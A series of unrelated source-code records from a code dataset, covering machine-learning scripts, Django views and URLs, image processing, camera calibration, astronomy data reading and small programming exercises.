round(f1_score(np.round(predictions),np.round(y_test),average='weighted'),5)\n\tprint \"mult f_score: \", f_score\n\ttrue_label = (y_test >= 0)\n\tpredicted_label = (predictions >= 0)\n\tprint \"Confusion Matrix :\"\n\tprint confusion_matrix(true_label, predicted_label)\n\tprint \"Classification Report :\"\n\tprint classification_report(true_label, predicted_label, digits=5)\n\tprint \"Accuracy \", accuracy_score(true_label, predicted_label)\n\tsys.stdout.flush()\n\n\ndef test(X_test, y_test, metric):\n\tX_test = X_test.swapaxes(0,1)\n\tdef predict(model, X_test):\n\t\tepoch_loss = 0\n\t\tmodel.eval()\n\t\twith torch.no_grad():\n\t\t\tbatch_X = torch.Tensor(X_test).cuda()\n\t\t\tpredictions = model.forward(batch_X).squeeze(1)\n\t\t\tpredictions = predictions.cpu().data.numpy()\n\t\treturn predictions\n\tif metric == 'mae':\n\t\tmodel = torch.load('best/mfn_mae.pt')\n\tif metric == 'acc':\n\t\tmodel = torch.load('best/mfn_acc.pt')\n\tmodel = model.cpu().cuda()\n\t\n\tpredictions = predict(model, X_test)\n\tprint predictions.shape\n\tprint y_test.shape\n\tmae = np.mean(np.absolute(predictions-y_test))\n\tprint \"mae: \", mae\n\tcorr = np.corrcoef(predictions,y_test)[0][1]\n\tprint \"corr: \", corr\n\tmult = round(sum(np.round(predictions)==np.round(y_test))/float(len(y_test)),5)\n\tprint \"mult_acc: \", mult\n\tf_score = round(f1_score(np.round(predictions),np.round(y_test),average='weighted'),5)\n\tprint \"mult f_score: \", f_score\n\ttrue_label = (y_test >= 0)\n\tpredicted_label = (predictions >= 0)\n\tprint \"Confusion Matrix :\"\n\tprint confusion_matrix(true_label, predicted_label)\n\tprint \"Classification Report :\"\n\tprint classification_report(true_label, predicted_label, digits=5)\n\tprint \"Accuracy \", accuracy_score(true_label, predicted_label)\n\tsys.stdout.flush()\n\nlocal = False\n\nif local:\n\tX_train, y_train, X_valid, y_valid, X_test, y_test = get_data(args,config)\n\n\th5f = h5py.File('data/X_train.h5', 'w')\n\th5f.create_dataset('data', data=X_train)\n\th5f = h5py.File('data/y_train.h5', 'w')\n\th5f.create_dataset('data', data=y_train)\n\th5f = h5py.File('data/X_valid.h5', 'w')\n\th5f.create_dataset('data', data=X_valid)\n\th5f = h5py.File('data/y_valid.h5', 'w')\n\th5f.create_dataset('data', data=y_valid)\n\th5f = h5py.File('data/X_test.h5', 'w')\n\th5f.create_dataset('data', data=X_test)\n\th5f = h5py.File('data/y_test.h5', 'w')\n\th5f.create_dataset('data', data=y_test)\n\n\tsys.stdout.flush()\n\nX_train, y_train, X_valid, y_valid, X_test, y_test = load_saved_data()\n\ntest(X_test, y_test, 'mae')\ntest(X_test, y_test, 'acc')\nassert False\n\n#config = dict()\n#config[\"batchsize\"] = 32\n#config[\"num_epochs\"] = 100\n#config[\"lr\"] = 0.01\n#config[\"h\"] = 128\n#config[\"drop\"] = 0.5\n#train_ef(X_train, y_train, X_valid, y_valid, X_test, y_test, config)\n#assert False\n\nwhile True:\n\t# mae 0.993 [{'input_dims': [300, 5, 20], 'batchsize': 128, 'memsize': 128, \n\t#'windowsize': 2, 'lr': 0.01, 'num_epochs': 100, 'h_dims': [88, 48, 16], 'momentum': 0.9}, \n\t#{'shapes': 128, 'drop': 0.0}, {'shapes': 64, 'drop': 0.2}, \n\t#{'shapes': 256, 'drop': 0.0}, {'shapes': 64, 'drop': 0.2}, \n\t#{'shapes': 64, 'drop': 0.5}]\n\n\t# acc 77.0 [{'input_dims': [300, 5, 20], 'batchsize': 128, 'memsize': 400, \n\t#'windowsize': 2, 'lr': 0.005, 'num_epochs': 100, 'h_dims': [64, 8, 80], 'momentum': 0.9}, \n\t#{'shapes': 128, 'drop': 0.5}, {'shapes': 128, 'drop': 0.2}, \n\t#{'shapes': 128, 'drop': 0.5}, {'shapes': 128, 'drop': 0.5}, \n\t#{'shapes': 256, 'drop': 0.5}]\n\n\tconfig = 
dict()\n\tconfig[\"input_dims\"] = [300,5,20]\n\thl = random.choice([32,64,88,128,156,256])\n\tha = random.choice([8,16,32,48,64,80])\n\thv = random.choice([8,16,32,48,64,80])\n\tconfig[\"h_dims\"] = [hl,ha,hv]\n\tconfig[\"memsize\"] = random.choice([64,128,256,300,400])\n\tconfig[\"windowsize\"] = 2\n\tconfig[\"batchsize\"] = random.choice([32,64,128,256])\n\tconfig[\"num_epochs\"] = 50\n\tconfig[\"lr\"] = random.choice([0.001,0.002,0.005,0.008,0.01])\n\tconfig[\"momentum\"] = random.choice([0.1,0.3,0.5,0.6,0.8,0.9])\n\tNN1Config = dict()\n\tNN1Config[\"shapes\"] = random.choice([32,64,128,256])\n\tNN1Config[\"drop\"] = random.choice([0.0,0.2,0.5,0.7])\n\tNN2Config = dict()\n\tNN2Config[\"shapes\"] = random.choice([32,64,128,256])\n\tNN2Config[\"drop\"] = random.choice([0.0,0.2,0.5,0.7])\n\tgamma1Config = dict()\n\tgamma1Config[\"shapes\"] = random.choice([32,64,128,256])\n\tgamma1Config[\"drop\"] = random.choice([0.0,0.2,0.5,0.7])\n\tgamma2Config = dict()\n\tgamma2Config[\"shapes\"] = random.choice([32,64,128,256])\n\tgamma2Config[\"drop\"] = random.choice([0.0,0.2,0.5,0.7])\n\toutConfig = dict()\n\toutConfig[\"shapes\"] = random.choice([32,64,128,256])\n\toutConfig[\"drop\"] = random.choice([0.0,0.2,0.5,0.7])\n\tconfigs = [config,NN1Config,NN2Config,gamma1Config,gamma2Config,outConfig]\n\tprint configs\n\ttrain_mfn(X_train, y_train, X_valid, y_valid, X_test, y_test, configs)\n\n\"\"\"\n","sub_path":"src/models/M3ER/modules/mfn.py","file_name":"mfn.py","file_ext":"py","file_size_in_byte":12781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"401393435","text":"import numpy as np\nimport pylab as plt\n\ndef calc_req(A,B,C,D,E):\n X = B*A/(A+B+C)\n Y = B*C/(A+B+C)\n Z = A*C/(A+B+C)\n return X + (D+Y)*(E+Z)/(D+Y+E+Z)\n\nomega = np.logspace(6,12,1000)\n\nCE = 1e-6\nCD = 6e-6\n#D = 1/1j/omega/CD\nD = 1j*omega*CD\nE = 1/1j/omega/CE\nA = 1e5\nB = 1e2\nC = 1e3\n\nz = calc_req(A,B,C,D,E)\nplt.plot(omega,np.real(z),label='real')\nplt.xscale('log')\n#plt.plot(omega,np.imag(z),label='imag')\n#plt.plot(omega,np.abs(z),label='abs')\nplt.legend()\nplt.show()\n\n","sub_path":"soft-ir-fitting/data/temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"163254528","text":"from django.conf.urls import url\nfrom . import views\nfrom . 
api import PostApi, CommentApi\n\napp_name = 'post'\n\nurlpatterns = [\n url(r'^$',views.PostListView.as_view(), name='post_list'),\n url(r'^about/$',views.AboutView.as_view(),name='about'),\n url(r'^post/(?P\\d+)$',views.PostDetailView.as_view(),name='post_detail'),\n url(r'^post/new$',views.CreatePostView.as_view(),name='post_new'),\n url(r'^post/(?P\\d+)/edit/$',views.PostUpdateView.as_view(),name='post_edit'),\n url(r'^post/(?P\\d+)/edit/remove/$',views.PostDeleteView.as_view(),name='post_remove'),\n url(r'^draft/$',views.DraftListView.as_view(),name='post_draft_list'),\n url(r'^post/(?P\\d+)/publish/$', views.post_publish, name='post_publish'),\n url(r'^post/(?P\\d+)/comment/$',views.add_comments_to_post, name='add_comments_to_post'),\n url(r'^comment/(?P\\d+)/approve/$',views.comment_approve,name='comment_approve'),\n url(r'^comment/(?P\\d+)/remove/$',views.comment_remove,name='comment_remove'),\n url(r'^post$',PostApi.as_view()),\n url(r'^comment$',CommentApi.as_view()),\n]\n","sub_path":"mysite/blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"10141543","text":"# Author imagean\n# !/usr/bin/python\n# -*- coding:utf-8\n# opencv read image is BGR channel,and matplot read is RGB\nimport cv2 as cv\nfrom matplotlib import pyplot as plt\nimage = cv.imread('C:/Users/19845/Desktop/1234.jpg',0)\nblurred = cv.GaussianBlur(image, (5, 5), 0)\n\n#cv2.ADAPTIVE_THRESH_MEAN_C 平均值\nthresh1 = cv.adaptiveThreshold(blurred, 255,cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY_INV, 11, 4)\n#cv2.ADAPTIVE_THRESH_GAUSSIAN_C 高斯分布加权和\nthresh2 = cv.adaptiveThreshold(blurred, 255,cv.ADAPTIVE_THRESH_GAUSSIAN_C, cv.THRESH_BINARY_INV, 15, 3)\nplt.subplot(131), plt.imshow(blurred, \"gray\"),plt.title(\"Source Image\"), plt.xticks([]), plt.yticks([])\nplt.subplot(132), plt.imshow(thresh1, \"gray\"),plt.title(\"ADAPTIVE_THRESH_MEAN_C \"), plt.xticks([]), plt.yticks([])\nplt.subplot(133), plt.imshow(thresh2, \"gray\"),plt.title(\"ADAPTIVE_THRESH_GAUSSIAN_C \"), plt.xticks([]), plt.yticks([])\nplt.show()","sub_path":"9/005Threhold.py","file_name":"005Threhold.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"483976031","text":"import pandas as pd\nimport datetime\nimport numpy as np\nfrom sklearn import preprocessing\n\nexprs = pd.read_csv(r'C:\\Users\\MrFive1001\\Documents\\PycharmProjects\\Kaggle\\learning2\\exprs_GSE5859.csv',\n sep=',', index_col=0)\nsampleinfo = pd.read_csv(r'C:\\Users\\MrFive1001\\Documents\\PycharmProjects\\Kaggle\\learning2\\sampleinfo_GSE5859.csv',\n sep=',')\n\na = list(sampleinfo.filename)\nb = list(exprs.columns)\nmatchIndex = [b.index(x) for x in a]\n\nexprs = exprs.iloc[:, matchIndex]\nprint(exprs.head())\nprint(sampleinfo.head())\n\nsampleinfo.date = pd.to_datetime(sampleinfo.date)\nsampleinfo['year'] = [i.year for i in sampleinfo.date]\nsampleinfo['month'] = [i.month for i in sampleinfo.date]\n\nspecial = datetime.datetime(2002, 10, 31)\nsampleinfo['elapsedInDays'] = [i - special for i in sampleinfo.date]\nprint(sampleinfo.head())\n\nCEUsample = sampleinfo[sampleinfo.ethnicity == 'CEU'].copy()\nprint(CEUsample.head())\nCEUexprs = exprs.iloc[:, np.arange(len(exprs.columns))[sampleinfo.ethnicity == 'CEU']].copy()\npd.DataFrame(preprocessing.minmax_scale(CEUexprs), index=CEUexprs.index, 
columns=CEUexprs.columns)\n","sub_path":"Algor/MachineLea/000data_analyse/learning2/problem1.py","file_name":"problem1.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"169701234","text":"def nucleotide_to_rna(nucleotide):\n if nucleotide == 'G':\n nucleotide = 'C'\n elif nucleotide == 'C':\n nucleotide = 'G'\n elif nucleotide == 'T':\n nucleotide = 'A'\n elif nucleotide == 'A':\n nucleotide = 'U'\n return nucleotide\n\ndef to_rna(strand):\n return ''.join(map(nucleotide_to_rna, strand))\n","sub_path":"python/rna-transcription/rna_transcription.py","file_name":"rna_transcription.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"600117255","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.python.compiler.mlcompute import mlcompute\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.pyplot import imshow\n\nmlcompute.set_mlc_device(device_name='gpu')\ntf.config.run_functions_eagerly(False)\n\n(x_train, _), (x_test, _) = mnist.load_data()\nx_train = x_train.astype('float32') / 255.\nx_test = x_test.astype('float32') / 255.\nx_train = np.reshape(x_train, (len(x_train), 28, 28, 1))\nx_test = np.reshape(x_test, (len(x_test), 28, 28, 1))\n\nnoise_factor = 0.5\n# numpy.random.normal 函數裡的三個參數分别代表生成的高斯分布的均值、標準差以及輸出的 size\nx_train_noisy = x_train + noise_factor * np.random.normal(loc=0.0, scale=1.0, size=x_train.shape) \nx_test_noisy = x_test + noise_factor * np.random.normal(loc=0.0, scale=1.0, size=x_test.shape)\n\nx_train_noisy = np.clip(x_train_noisy, 0., 1.) # 把 array 限制在一定範圍内\nx_test_noisy = np.clip(x_test_noisy, 0., 1.)\n\ninput_img = layers.Input(shape=(28, 28, 1)) # adapt this if using `channels_first` image data format \n# Encoder 使用卷積層,激活函數用 relu,輸入的維度就是上面定義的 input_img\nx = layers.Conv2D(16, (3, 3), activation='relu', padding='same')(input_img)\nx = layers.MaxPooling2D((2, 2), padding='same')(x)\nx = layers.Conv2D(8, (3, 3), activation='relu', padding='same')(x)\nx = layers.MaxPooling2D((2, 2), padding='same')(x)\nx = layers.Conv2D(8, (3, 3), activation='relu', padding='same')(x)\n# 這邊與官方有點不同,我們為編碼器設置了一個名稱,以便能夠訪問它\nencoded = layers.MaxPooling2D((2, 2), padding='same', name='encoder')(x) \n\n# at this point the representation is (4, 4, 8) i.e. 
128-dimensional: 4*4*8=128\n\n# Decoder 的過程與 Encoder 正好相反,需要跟 Encoder 的神經網絡層做相對應,相對應的激活函數也是一樣,\n# 但這邊在解碼中最後一層使用的激活函數是 sigmoid\nx = layers.Conv2D(8, (3, 3), activation='relu', padding='same')(encoded)\nx = layers.UpSampling2D((2, 2))(x)\nx = layers.Conv2D(8, (3, 3), activation='relu', padding='same')(x)\nx = layers.UpSampling2D((2, 2))(x)\nx = layers.Conv2D(16, (3, 3), activation='relu')(x)\nx = layers.UpSampling2D((2, 2))(x)\ndecoded = layers.Conv2D(1, (3, 3), activation='sigmoid', padding='same')(x)\n\n# 用 Model 來搭建模型,輸入為圖片,輸出是解碼的結果\nautoencoder = keras.Model(input_img, decoded) \n\n# 編譯模型,optimizer 使用 adam,loss 使用 binary_crossentropy\nautoencoder.compile(optimizer='adam', loss='binary_crossentropy')\n\n# 訓練 Denoising AE ,輸入是加入雜訊的圖片,輸出是原始圖片\nautoencoder.fit(x_train_noisy, x_train,\n epochs=20,\n batch_size=128,\n shuffle=True,\n validation_data=(x_test_noisy, x_test))\n\nautoencoder.save('auto-encoder/denoising.h5') # 與官方有點不同的是,多做了保存模型的動作c","sub_path":"auto-encoder/denoising-model.py","file_name":"denoising-model.py","file_ext":"py","file_size_in_byte":3061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"193832054","text":"import re\nimport os\nimport sys\nfrom datetime import datetime\n\nimport numpy as np\nimport scipy.io as sio\nimport datajoint as dj\n\nschema = dj.schema(dj.config.get('database.prefix', '') + 'reference')\n\n\n@schema\nclass AnimalSource(dj.Lookup):\n definition = \"\"\"\n animal_source: varchar(32) # source of the animal, Jax, Charles River etc.\n \"\"\"\n contents = zip(['Jackson', 'Charles River', 'Guoping Feng', 'Homemade', 'Unknown'])\n\n\n@schema\nclass Strain(dj.Lookup):\n definition = \"\"\" \n strain: varchar(24)\n \"\"\"\n contents = zip(['C57', 'Ai35D', 'VGAT-ChR2-EYFP', 'Ai32', 'GAD2-Cre', 'PV-Cre', 'Unknown'])\n\n\n@schema\nclass Laboratory(dj.Lookup):\n definition = \"\"\" \n lab_name: varchar(24) # name of lab\n ---\n lab_description=null: varchar(128) \n \"\"\"\n contents = [['WangLab', 'WangLab']]\n\n\n@schema\nclass InjectionType(dj.Lookup):\n definition = \"\"\" \n injection_type: varchar(30) # # (Str) what kind of tracer/injection\n \"\"\"\n contents = zip(['flourescent'])\n","sub_path":"project_schemas/atlas_schema_python_v3/atlas_pipeline/reference.py","file_name":"reference.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"229187431","text":"# Licensed under a 3-clause BSD style license - see LICENSE.rst\n\"\"\"\nEventSource for NectarCam protobuf-fits.fz-files.\n\nNeeds protozfits v1.02.0 from github.com/cta-sst-1m/protozfitsreader\n\"\"\"\n\nimport numpy as np\nfrom .eventsource import EventSource\nfrom .containers import NectarCAMDataContainer\n\n__all__ = ['NectarCAMEventSource']\n\n\nclass NectarCAMEventSource(EventSource):\n\n def __init__(self, config=None, tool=None, **kwargs):\n super().__init__(config=config, tool=tool, **kwargs)\n from protozfits import File\n self.file = File(self.input_url)\n self.header = next(self.file.RunHeader)\n\n\n def _generator(self):\n\n self._pixel_sort_ids = None\n\n for count, event in enumerate(self.file.Events):\n data = NectarCAMDataContainer()\n data.count = count\n # fill specific NectarCAM data\n data.nectarcam.fill_from_zfile_event(event, self.header.numTraces)\n # fill general R0 data\n self.fill_R0Container_from_zfile_event(data.r0, event)\n yield data\n\n\n @staticmethod\n def is_compatible(file_path):\n from astropy.io import fits\n 
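# probe the FITS headers only; no event data is decoded here\n 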
try:\n # The file contains two tables:\n # 1: RunHeader\n # 2: Events <--- this is what we need to look at\n h = fits.open(file_path)[2].header\n ttypes = [\n h[x] for x in h.keys() if 'TTYPE' in x\n ]\n except OSError:\n # not even a fits file\n return False\n\n except IndexError:\n # A fits file of a different format\n return False\n\n is_protobuf_zfits_file = (\n (h['XTENSION'] == 'BINTABLE') and\n (h['EXTNAME'] == 'Events') and\n (h['ZTABLE'] is True) and\n (h['ORIGIN'] == 'CTA') and\n (h['PBFHEAD'] == 'DataModel.CameraEvent')\n )\n\n is_nectarcam_file = 'hiGain_integrals_gains' in ttypes\n return is_protobuf_zfits_file & is_nectarcam_file\n\n\n def fill_R0CameraContainer_from_zfile_event(self, container, event):\n container.trigger_time = (\n event.local_time_sec * 1E9 + event.local_time_nanosec)\n container.trigger_type = event.event_type\n\n container.waveform = np.array([\n (\n event.hiGain.waveforms.samples\n ).reshape(-1, self.header.numTraces),\n (\n event.loGain.waveforms.samples\n ).reshape(-1, self.header.numTraces)\n ])\n\n container.num_samples = container.waveform.shape[1]\n\n def fill_R0Container_from_zfile_event(self, container, event):\n container.obs_id = -1\n container.event_id = event.eventNumber\n\n container.tels_with_data = [self.header.telescopeID, ]\n r0_cam_container = container.tel[self.header.telescopeID]\n self.fill_R0CameraContainer_from_zfile_event(\n r0_cam_container,\n event\n )\n","sub_path":"ctapipe/io/nectarcameventsource.py","file_name":"nectarcameventsource.py","file_ext":"py","file_size_in_byte":2962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"546967468","text":"import re\n\npattern = re.compile(r\"(\\w+) (\\w+)\")\n\nstr = \"hello 123, hello 456\"\nm = pattern.sub(\"hello world\",str)\n\nprint(m)\n\nm2 = pattern.sub(r\"\\1 \\2\", str)\nprint(m2)","sub_path":"re_sub.py","file_name":"re_sub.py","file_ext":"py","file_size_in_byte":165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"44"} +{"seq_id":"349621956","text":"\n #\n# % # ***************************************************************************\n# % # Stereo Vision - Thermal\n# % # ---------------------------------\n# % # Written by: Lakitha Omal Harindha Wijeratne\n# % # - for -\n# % # Mints: Multi-scale Integrated Sensing and Simulation\n# % # ---------------------------------\n# % # Date: January 23rd, 2020\n# % # ---------------------------------\n# % # This module is written for generic implimentation of MINTS projects\n# % # --------------------------------------------------------------------------\n# % # https://github.com/mi3nts\n# % # http://utdmints.info/\n# % # ***************************************************************************\n#\n# Chapter_05 : Saving Left and Thermal Parameters for Matlab\n\n\nimport cv2\nimport pickle\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport os\n\n\nprint(cv2.__version__)\n\nprint(\"Loading data from the stereo calibration\")\n\nstereoParams = pickle.load(open(\"stereoParams_Feb_12_2020.p\", \"rb\"))\nthermalParams = pickle.load(open(\"thermalParams_Feb_12_2020.p\", \"rb\"))\n\nprint(stereoParams)\n\n# Matlab needs the calibrated images to get the images for dewarping\n# The following block of code is used to dewarping the images and\n# saving them\n\n\nprint(stereoParams)\n\nfileNamePre = '../threeWayImageDataSets/utdSet4/'\nfileNamePost = '../threeWayImageDataSets/utdSet4PyCalibrated/'\n\ntimeCurrentAll = [ \\\n 
'040_11_05_17_58_00_', \\\n '050_11_05_17_58_28_', \\\n '060_11_05_17_58_56_', \\\n '070_11_05_17_59_24_', \\\n '080_11_05_17_59_52_', \\\n '090_11_05_18_00_28_', \\\n '100_11_05_18_00_56_', \\\n '110_11_05_18_01_17_', \\\n '120_11_05_18_01_52_', \\\n '130_11_05_18_02_27_', \\\n '140_11_05_18_02_48_', \\\n '150_11_05_18_03_23_', \\\n '160_11_05_18_03_44_', \\\n '170_11_05_18_04_41_', \\\n '180_11_05_18_05_02_', \\\n '190_11_05_18_05_44_', \\\n '200_11_05_18_06_12_', \\\n '210_11_05_18_07_08_', \\\n '220_11_05_18_07_36_', \\\n '230_11_05_18_08_05_', \\\n '240_11_05_18_08_33_', \\\n '250_11_05_18_09_29_', \\\n '260_11_05_18_10_04_', \\\n '270_11_05_18_10_32_', \\\n '280_11_05_18_11_21_', \\\n '290_11_05_18_11_57_', \\\n '300_11_05_18_12_32_', \\\n ]\n\ndef directoryCheck(outputPath):\n\n exists = os.path.isfile(outputPath)\n print(exists)\n directoryIn = os.path.dirname(outputPath)\n print(directoryIn)\n if not os.path.exists(directoryIn):\n os.makedirs(directoryIn)\n return exists\n\n\nfor timeCurrent in timeCurrentAll:\n\n print(\"============\")\n print(timeCurrent)\n leftImageName = fileNamePre + 'leftNegative/' + timeCurrent +'leftNegative.jpg'\n rightImageName = fileNamePre + 'rightNegative/' + timeCurrent +'rightNegative.jpg'\n thermalImageName = fileNamePre + 'thermal/' + timeCurrent +'thermal.jpg'\n\n leftImageNamePost = fileNamePost + 'leftNegative/' + timeCurrent +'leftNegative.jpg'\n rightImageNamePost = fileNamePost+ 'rightNegative/' + timeCurrent +'rightNegative.jpg'\n thermalImageNamePost = fileNamePost+ 'thermal/' + timeCurrent +'thermal.jpg'\n\n imLeft = cv2.imread(leftImageName)\n imRight = cv2.imread(rightImageName)\n imThermal = cv2.imread(thermalImageName)\n\n imLeftRemapped =cv2.remap(imLeft,stereoParams['mapXLeft'],\\\n stereoParams['mapYLeft'],\\\n cv2.INTER_CUBIC)\n imRightRemapped=cv2.remap(imRight,stereoParams['mapXRight'],\\\n stereoParams['mapYRight'],\n cv2.INTER_CUBIC)\n\n imThermalRemapped = cv2.undistort(\\\n imThermal,\\\n thermalParams['mtxThermal'],\\\n thermalParams['distThermal']\n , None,\\\n thermalParams['newcameramtx']\\\n )\n\n\n\n directoryCheck(leftImageNamePost)\n directoryCheck(rightImageNamePost)\n directoryCheck(thermalImageNamePost)\n\n cv2.imwrite(leftImageNamePost, imLeftRemapped);\n cv2.imwrite(rightImageNamePost, imRightRemapped);\n cv2.imwrite(thermalImageNamePost, imThermalRemapped);\n","sub_path":"firmware/oldCode/pythonReplica/MC_05_1_saveImagesForMatLab.py","file_name":"MC_05_1_saveImagesForMatLab.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"437273096","text":"from polynomials import Polynomial\nimport pytest\n\n\n@pytest.mark.parametrize(\n \"f, x, val\",\n (((0, 1), 8, 8),\n ((2, 0, 3), -3, 29),\n ((4, 2), -11, -18))\n )\ndef test_call(f, x, val):\n assert Polynomial(f)(x) == val\n","sub_path":"exercise_03/exercise_3_YanisMiraoui/tests/test_exercise_3_3_4.py","file_name":"test_exercise_3_3_4.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"640281279","text":"import sys\nimport collections\n\ndef find_longest_word_in_string(letters, words):\n dd = collections.defaultdict(lambda: 'N/A')\n Pair = collections.namedtuple('pair', ['w', 'i'])\n for word in words:\n if dd[word[0]] == 'N/A':\n dd[word[0]] = []\n dd[word[0]].append(Pair(word, 0))\n for letter in letters:\n if dd[letter] == 'N/A':\n pass\n else:\n pairs = dd[letter][:]\n 
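# snapshot the pairs currently waiting on this letter before the bucket is cleared;\n # each pair advances one matched character and is re-filed under the next character\n # it needs, while fully matched words remain in the current bucket\n 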
dd[letter] = []\n for pair in pairs:\n if len(pair.w) > pair.i:\n pair = Pair(pair.w, pair.i + 1)\n if len(pair.w) > pair.i:\n if dd[pair.w[pair.i]] == 'N/A':\n dd[pair.w[pair.i]] = []\n dd[pair.w[pair.i]].append(pair)\n else:\n dd[letter].append(pair)\n resPair = Pair('', 0)\n for letter in dd:\n for pair in dd[letter]:\n if pair.i > resPair.i:\n resPair = pair\n return resPair.i, resPair.w\n\nif __name__ == '__main__':\n S = \"abppplee\"\n D = [\"able\", \"ale\", \"apple\", \"bale\", \"kangaroo\"]\n i, w = find_longest_word_in_string(S, D)\n print(i, w)","sub_path":"interviews/googletechdevguide/1-find-longest-word-in-dictionary-that-subsequence-of-given-string/MyAnswer.py","file_name":"MyAnswer.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"263185380","text":"my_dict = { 'name': 'Ewelina', 'age': 26}\n\nuniversities = [\n {\n 'name': 'Oxford',\n 'location': 'UK'\n }\n]\n\n\n\nlottery_players = [\n{\n 'name': 'Rolf',\n 'numbers': (13, 45, 66, 23, 22)\n},\n{\n 'name': 'John',\n 'numbers': (14, 56, 80, 23, 22)\n}\n]\n\nprint(sum(lottery_players[0]['numbers']))\n","sub_path":"dictionary.py","file_name":"dictionary.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"42250203","text":"# from django.http.response import HttpResponse\n# from django.conf import settings\n# import os\nfrom django.shortcuts import redirect\nfrom core.models import Target, Activity\n\n\ndef get_pixel(request, id):\n \"\"\"\n get the ID from the URL, fetch the Target object for that ID, and redirect to the target object's redirect_uri\n \"\"\"\n try:\n target = Target.objects.get(id=id)\n redirect_uri = target.redirect_uri\n data = request.META\n activity = Activity.objects.create(\n target=target,\n # remote_addr=data.get('REMOTE_ADDR'),\n remote_addr=data.get('HTTP_X_FORWARDED_FOR'),\n user_agent=data.get('HTTP_USER_AGENT')\n )\n print(data)\n print(f'TARGET: {target.__dict__}')\n print(f'ACTIVITY: {activity.__dict__}')\n return redirect(redirect_uri)\n except Exception as e:\n print(f'EXCEPTION: << id {id} >> {str(e)}')\n return redirect('https://www.example.com')\n","sub_path":"core/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"356036154","text":"from math import sqrt, log, modf\n\nlimit = 1000000\nfib = [0] * (limit+1)\n\n\ndef digits_fib(n):\n return -log(5,10) / 2 + n * log((1 + sqrt(5)) / 2, 10)\n\n\ndef compute():\n f_0, f_1 = 0, 1\n i = 2\n while True:\n temp = (f_0 + f_1) % (10**9)\n f_0 = f_1\n f_1 = temp\n if \"\".join(sorted((list(str(f_1))))) == '123456789':\n first_digits = modf(10**(modf(digits_fib(i))[0]+8))[1]\n if \"\".join(sorted(list(str(first_digits))))[2:] == '123456789':\n return i\n i += 1\n\n\nif __name__ == \"__main__\":\n print(compute())\n","sub_path":"Python/104.py","file_name":"104.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"}
{"seq_id":"334003378","text":"\n\nfrom xai.brain.wordbase.nouns._phial import _PHIAL\n\n#class header\nclass _PHIALS(_PHIAL, ):\n\tdef __init__(self,): \n\t\t_PHIAL.__init__(self)\n\t\tself.name = \"PHIALS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"phial\"\n\t\tself.jsondata = 
{}\n","sub_path":"xai/brain/wordbase/nouns/_phials.py","file_name":"_phials.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
{"seq_id":"559663672","text":"\"\"\"******************************************************************************\n* Purpose: Distinct Triples\n*\n* @author: Nikhil Lad\n* @version: 3.7\n* @since: 24-12-2018\n*\n******************************************************************************\n\"\"\"\n\nfrom Utility import utilities\nu=utilities.util()\n\ndef distince_triples():\n l = []\n try:\n\n a=int(input(\"how many numbers? \"))\n for i in range(0,a):\n x = int(input(\"enter no. \\n\"))\n l.insert(i, x)\n print(l)\n u.distinct_triples(l)\n except ValueError:\n print(\"Enter valid number\")\n\nif __name__ == \"__main__\":\n distince_triples()","sub_path":"DistinctTriples.py","file_name":"DistinctTriples.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"}
